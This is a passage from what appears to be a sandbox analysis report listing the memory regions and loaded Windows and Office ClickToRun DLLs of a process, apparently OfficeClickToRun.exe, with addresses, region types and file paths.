mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 5068 start_va = 0x690000 end_va = 0x691fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 5069 start_va = 0x6a0000 end_va = 0x6a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 5070 start_va = 0x6b0000 end_va = 0x6bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 5071 start_va = 0x760000 end_va = 0x8e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 5072 start_va = 0x8f0000 end_va = 0x8f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 5073 start_va = 0x900000 end_va = 0x900fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 5074 start_va = 0x910000 end_va = 0x910fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 5075 start_va = 0x920000 end_va = 0x920fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 5076 start_va = 0x930000 end_va = 0x930fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 5077 start_va = 0x940000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 5078 start_va = 0x950000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 5079 start_va = 0xae0000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 5080 start_va = 0xba0000 end_va = 0xed6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5081 start_va = 0xee0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 5082 start_va = 0xfe0000 end_va = 0x12e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll") Region: id = 5083 start_va = 0x12f0000 end_va = 0x13effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 5084 start_va = 0x13f0000 end_va = 0x13f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013f0000" filename = "" Region: id = 5085 start_va = 0x14b0000 end_va = 0x14bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 5086 start_va = 0x14c0000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 5087 start_va = 0x15c0000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 5088 start_va = 0x16c0000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 5089 start_va = 0x17c0000 end_va = 0x18bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 5090 start_va = 0x18c0000 end_va = 0x19c8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 5091 start_va = 0x19d0000 end_va = 0x1be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 5092 start_va = 0x1bf0000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 5093 start_va = 0x1cf0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 5094 start_va = 0x1ef0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 5095 start_va = 0x1ff0000 end_va = 0x20effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 5096 start_va = 0x20f0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020f0000" filename = "" Region: id = 5097 start_va = 0x21f0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 5098 start_va = 0x22f0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 5099 start_va = 0x23f0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 5100 start_va = 0x24f0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 5101 start_va = 0x25f0000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 5102 start_va = 0x26f0000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 5103 start_va = 0x27f0000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 5104 start_va = 0x28f0000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 5105 start_va = 0x2af0000 end_va = 0x2eeafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002af0000" filename = "" Region: id = 5106 start_va = 0x2ef0000 end_va = 0x2feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 5107 start_va = 0x2ff0000 end_va = 0x33effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ff0000" filename = "" Region: id = 5108 start_va = 0x33f0000 end_va = 0x34effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 5109 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5110 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 5111 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 5112 start_va = 0x7ff7df520000 end_va = 0x7ff7df7c8fff monitored = 0 entry_point = 0x7ff7df542188 region_type = mapped_file name = "officeclicktorun.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe") Region: id = 5113 start_va = 0x7ff84b530000 end_va = 0x7ff84b691fff monitored = 0 entry_point = 0x7ff84b581b30 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 5114 start_va = 0x7ff84c950000 end_va = 0x7ff84cbddfff monitored = 0 entry_point = 0x7ff84ca20f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 5115 start_va = 0x7ff84cde0000 end_va = 0x7ff84cdf3fff monitored = 0 entry_point = 0x7ff84cde3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 5116 start_va = 0x7ff84ce90000 end_va = 0x7ff84ceadfff monitored = 0 entry_point = 0x7ff84ce9ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 5117 start_va = 0x7ff84d1d0000 end_va = 0x7ff84d24ffff monitored = 0 entry_point = 0x7ff84d1fd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 5118 start_va = 0x7ff84d450000 end_va = 0x7ff84d607fff monitored = 0 entry_point = 0x7ff84d4be630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 5119 start_va = 0x7ff84d810000 end_va = 0x7ff84d823fff monitored = 0 entry_point = 0x7ff84d811800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 5120 start_va = 0x7ff84d830000 end_va = 0x7ff84d925fff monitored = 0 entry_point = 0x7ff84d869590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 5121 start_va = 0x7ff84daf0000 end_va = 0x7ff84db00fff monitored = 0 entry_point = 0x7ff84daf2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 5122 start_va = 0x7ff84e1d0000 end_va = 0x7ff84e21cfff monitored = 0 entry_point = 0x7ff84e1e792c region_type = mapped_file name = "appvfilesystemmetadata.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll") Region: id = 5123 start_va = 0x7ff84e220000 end_va = 0x7ff84e379fff monitored = 0 entry_point = 0x7ff84e2d565c region_type = mapped_file name = "appvisvsubsystemcontroller.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll") Region: id = 5124 start_va = 0x7ff84e380000 end_va = 0x7ff84e589fff monitored = 0 entry_point = 0x7ff84e47b0a0 region_type = mapped_file name = "appvintegration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll") Region: id = 5125 start_va = 0x7ff84e590000 end_va = 0x7ff84e61cfff monitored = 0 entry_point = 0x7ff84e5d0cc4 region_type = mapped_file name = "appvisvvirtualization.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll") Region: id = 5126 start_va = 0x7ff84e620000 end_va = 0x7ff84e6c1fff monitored = 0 entry_point = 0x7ff84e66988c region_type = mapped_file name = "appvcatalog.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll") Region: id = 5127 start_va = 0x7ff84e6d0000 end_va = 0x7ff84e7fefff monitored = 0 entry_point = 0x7ff84e72f2a4 region_type = mapped_file name = "appvmanifest.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll") Region: id = 5128 start_va = 0x7ff84e800000 end_va = 0x7ff84e835fff monitored = 0 entry_point = 0x7ff84e80daa0 region_type = mapped_file name = "appvisvstreamingmanager.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll") Region: id = 5129 start_va = 0x7ff84e840000 end_va = 0x7ff84e929fff monitored = 0 entry_point = 0x7ff84e8aca10 region_type = mapped_file name = "appvorchestration.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll") Region: id = 5130 start_va = 0x7ff84e930000 end_va = 0x7ff84ea1efff monitored = 0 entry_point = 0x7ff84e9529cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll") Region: id = 5131 start_va = 0x7ff84ea20000 end_va = 0x7ff84eac5fff monitored = 0 entry_point = 0x7ff84ea6efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp120.dll") Region: id = 5132 start_va = 0x7ff84ead0000 end_va = 0x7ff84ec0efff monitored = 0 entry_point = 0x7ff84eb305e4 region_type = mapped_file name = "appvpolicy.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll") Region: id = 5133 start_va = 0x7ff84ec10000 end_va = 0x7ff84ec84fff monitored = 0 entry_point = 0x7ff84ec3d4f0 region_type = mapped_file name = "appvisvapi.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll") Region: id = 5134 start_va = 0x7ff84ec90000 end_va = 0x7ff84ed11fff monitored = 0 entry_point = 0x7ff84ece1550 region_type = mapped_file name = "msdelta.dll" filename = "\\Windows\\System32\\msdelta.dll" (normalized: "c:\\windows\\system32\\msdelta.dll") Region: id = 5135 start_va = 0x7ff84ed20000 end_va = 0x7ff84ee24fff monitored = 0 entry_point = 0x7ff84ed2dae8 region_type = mapped_file name = "streamserver.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\StreamServer.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\streamserver.dll") Region: id = 5136 start_va = 0x7ff84f920000 end_va = 0x7ff84f938fff monitored = 0 entry_point = 0x7ff84f924520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5137 start_va = 0x7ff84f940000 end_va = 0x7ff84f97ffff monitored = 0 entry_point = 0x7ff84f956c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 5138 start_va = 0x7ff850160000 end_va = 0x7ff8501defff monitored = 0 entry_point = 0x7ff850177110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 5139 start_va = 0x7ff8502c0000 end_va = 0x7ff8502cbfff monitored = 0 entry_point = 0x7ff8502c35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 5140 start_va = 0x7ff8502d0000 end_va = 0x7ff8502d9fff monitored = 0 entry_point = 0x7ff8502d1350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 5141 start_va = 0x7ff8502e0000 end_va = 0x7ff850619fff monitored = 0 entry_point = 0x7ff8502e8520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 5142 start_va = 0x7ff850620000 end_va = 0x7ff8507c8fff monitored = 0 entry_point = 0x7ff850674060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 5143 start_va = 0x7ff8507d0000 end_va = 0x7ff8510bafff monitored = 0 entry_point = 0x7ff8508d5a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll") Region: id = 5144 start_va = 0x7ff8510c0000 end_va = 0x7ff851537fff monitored = 0 entry_point = 0x7ff851139154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll") Region: id = 5145 start_va = 0x7ff851540000 end_va = 0x7ff851843fff monitored = 0 entry_point = 0x7ff8515e6094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll") Region: id = 5146 start_va = 0x7ff851850000 end_va = 0x7ff851ac3fff monitored = 0 entry_point = 0x7ff8518c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 5147 start_va = 0x7ff851ad0000 end_va = 0x7ff851af9fff monitored = 0 entry_point = 0x7ff851ad5b40 region_type = mapped_file name = "apiclient.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll") Region: id = 5148 start_va = 0x7ff851b00000 end_va = 0x7ff851b32fff monitored = 0 entry_point = 0x7ff851b021f0 region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 5149 start_va = 0x7ff851b40000 end_va = 0x7ff851bddfff monitored = 0 entry_point = 0x7ff851b89d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll") Region: id = 5150 start_va = 0x7ff851be0000 end_va = 0x7ff851bf6fff monitored = 0 entry_point = 0x7ff851bec440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll") Region: id = 5151 start_va = 0x7ff851d40000 end_va = 0x7ff851d49fff monitored = 0 entry_point = 0x7ff851d414c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 5152 start_va = 0x7ff852020000 end_va = 0x7ff852034fff monitored = 0 entry_point = 0x7ff852022dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 5153 start_va = 0x7ff8524b0000 end_va = 0x7ff8524bdfff monitored = 0 entry_point = 0x7ff8524b1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 5154 start_va = 0x7ff8527b0000 end_va = 0x7ff852816fff monitored = 0 entry_point = 0x7ff8527b63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 5155 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 5156 start_va = 0x7ff852890000 end_va = 0x7ff8528a9fff monitored = 0 entry_point = 0x7ff852892430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 5157 start_va = 0x7ff8528b0000 end_va = 0x7ff8528c5fff monitored = 0 entry_point = 0x7ff8528b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 5158 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 5159 start_va = 0x7ff8539c0000 end_va = 0x7ff853d41fff monitored = 0 entry_point = 0x7ff853a11220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5160 start_va = 0x7ff8556c0000 end_va = 0x7ff855787fff monitored = 0 entry_point = 0x7ff8557013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5161 start_va = 0x7ff855fc0000 end_va = 0x7ff855fe8fff monitored = 0 entry_point = 0x7ff855fcca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 5162 start_va = 0x7ff855ff0000 end_va = 0x7ff856025fff monitored = 0 entry_point = 0x7ff856000070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 5163 start_va = 0x7ff856030000 end_va = 0x7ff856574fff monitored = 0 entry_point = 0x7ff8561ca450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 5164 start_va = 0x7ff857320000 end_va = 0x7ff8573c1fff monitored = 0 entry_point = 0x7ff857340a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 5165 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5166 start_va = 0x7ff858160000 end_va = 0x7ff858209fff monitored = 0 entry_point = 0x7ff858187910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 5167 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 5168 start_va = 0x7ff858b00000 end_va = 0x7ff858b0bfff monitored = 0 entry_point = 0x7ff858b027e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5169 start_va = 0x7ff858c40000 end_va = 0x7ff858cb9fff monitored = 0 entry_point = 0x7ff858c61a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 5170 start_va = 0x7ff858d00000 end_va = 0x7ff858d33fff monitored = 0 entry_point = 0x7ff858d1ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5171 start_va = 0x7ff858d40000 end_va = 0x7ff858d49fff monitored = 0 entry_point = 0x7ff858d41830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 5172 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5173 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 5174 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5175 start_va = 0x7ff8590d0000 end_va = 0x7ff8590e6fff monitored = 0 entry_point = 0x7ff8590d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5176 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5177 start_va = 0x7ff859280000 end_va = 0x7ff8592b9fff monitored = 0 entry_point = 0x7ff859288d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 5178 start_va = 0x7ff8592c0000 end_va = 0x7ff8592e6fff monitored = 0 entry_point = 0x7ff8592d0aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5179 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5180 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5181 start_va = 0x7ff8596f0000 end_va = 0x7ff8596fffff monitored = 0 entry_point = 0x7ff8596f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 5182 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5183 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5184 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5185 start_va = 0x7ff859830000 end_va = 0x7ff859846fff monitored = 0 entry_point = 0x7ff859831390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5186 start_va = 0x7ff859850000 end_va = 0x7ff859a16fff monitored = 0 entry_point = 0x7ff8598adb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 5187 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5188 start_va = 0x7ff859c10000 